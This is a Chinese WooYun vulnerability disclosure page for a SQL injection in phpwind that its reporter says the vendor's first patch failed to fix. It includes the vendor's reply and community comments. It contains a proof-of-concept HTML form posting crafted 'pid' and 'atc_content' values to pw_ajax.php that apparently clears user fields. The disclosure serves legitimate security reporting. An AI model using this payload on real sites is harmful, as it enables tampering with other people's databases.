当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02799

漏洞标题:phpwind漏洞响应无法解决相应问题导致PW用户相关字段可被清空

相关厂商:phpwind

漏洞作者: Ray

提交时间:2011-09-08 11:35

修复时间:2011-10-08 11:36

公开时间:2011-10-08 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-09-08: 细节已通知厂商并且等待厂商处理中
2011-09-08: 厂商已经确认,细节仅向厂商公开
2011-09-11: 细节向第三方安全合作伙伴开放
2011-11-02: 细节向核心白帽子及相关领域专家公开
2011-11-12: 细节向普通白帽子公开
2011-11-22: 细节向实习白帽子公开
2011-10-08: 细节向公众公开

简要描述:

相关安全部门没有尽到安全响应的响应职责,未深刻理解漏洞原因,未与开发部门协调真实的解决问题,导致漏洞根本没补,却出了一个所谓的补丁,完成了一个“我们在第一时间就做出了响应,当天就已经修复并发布”的漏洞响应。

详细说明:

WooYun: PHPWIND最新版本SQL注入漏洞
我是通过gpc提交的atc_content为:pid,而不是[:pid],我确实不知道你们补丁到底是在干什么。

漏洞证明:

<form method="post" action="http://127.0.0.1/phpwind/pw_ajax.php?action=leaveword">
<input name="step" value="2">
<input name="verify" value="2367d749">
<input name="tid" value="1">
<input name="pid" value="#">
<input name="atc_content" value=":pid">
<input name="submit" type="submit">
</form>

修复方案:

再出一次补丁,出一次能用的补丁。
如果补丁出了一个月,却没有解决任何问题,是漏洞响应的机制出了问题,需要修复的是这个漏洞响应机制。
相关安全部门有无确切了解漏洞,有无和确切阐述漏洞,有无跟踪和测试补丁。
和xsser意愿相同,我希望甲方在修复漏洞的时候,表现出足够的尊重,例如不了解漏洞原因的情况下使用wooyun的站内信方式沟通,在相关补丁页面提供wooyun的补丁,你们前进一步我们的努力就不会倒退,站长知道并且能快速的链接到这边,能给你们增加多大的损失或劳动力么?

版权声明:转载请注明来源 Ray@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2011-09-08 17:39

厂商回复:

非常感谢Ray提出这个漏洞,我们已经跟进了该漏洞,发现只有8.3才受该漏洞的影响。新的补丁已经发布,链接如下http://www.phpwind.net/read-htm-tid-1400034.html,希望Ray届时帮忙确认漏洞是否修复成功,再次谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2011-09-08 16:08 | iv4n ( 实习白帽子 | Rank:49 漏洞数:10 )

    只有8.3才存在吧?

  2. 2011-09-08 17:21 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    官方补丁了 又不给链接 唉~~

  3. 2011-09-08 17:37 | Ray ( 实习白帽子 | Rank:75 漏洞数:7 )

    http://www.phpwind.net/read-htm-tid-1400034.html

  4. 2011-09-08 18:11 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    额 我错了~·